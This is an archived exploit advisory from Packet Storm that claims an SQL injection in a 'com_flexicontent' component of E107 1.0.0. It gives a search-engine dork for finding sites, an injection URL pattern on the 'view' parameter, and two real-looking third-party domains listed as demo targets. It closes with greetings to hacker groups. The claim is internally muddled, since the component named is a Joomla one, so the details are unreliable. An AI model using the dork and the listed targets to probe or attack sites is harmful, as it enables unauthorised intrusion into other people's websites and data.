E107 1.0.0 Flexicontent SQL Injection

2012-03-30T00:00:00
ID PACKETSTORM:111357
Type packetstorm
Reporter Am!r
Modified 2012-03-30T00:00:00

Description

                                        
                                            `########################################################  
#  
# Exploit Title : E107 1.0.0 Component com_flexicontent Sql Injection Vulnerabilitiy  
#  
# Author : Zarbat.Org & IrIsT.Ir  
#  
# Discovered By : Am!r  
#  
# Home : http://Zarbat.Org/forums/  
#  
# Software Link : http://e107.org/  
#  
# Security Risk : High  
#  
# Version : All Version  
#  
# Tested on : GNU/Linux Ubuntu - Windows Server - win7  
#  
# Dork : "powered by E107"  
#  
########################################################  
#  
# Expl0iTs :  
#  
# [TarGeT]/index.php?option=com_flexicontent&view=[Sql]  
#  
#  
# Demo:  
#  
# arra.ae/index.php?option=com_flexicontent&view=[Sql]  
#  
# mewlists.com/index.php?option=com_flexicontent&view=[Sql]  
#  
#########################################################  
#  
# Greats : Aria-Security.Com - datacoders.org - black-hg.org - Ashiyane.Org  
#   
# Security7.ir & And All Iranian Hackers  
#  
#########################################################  
`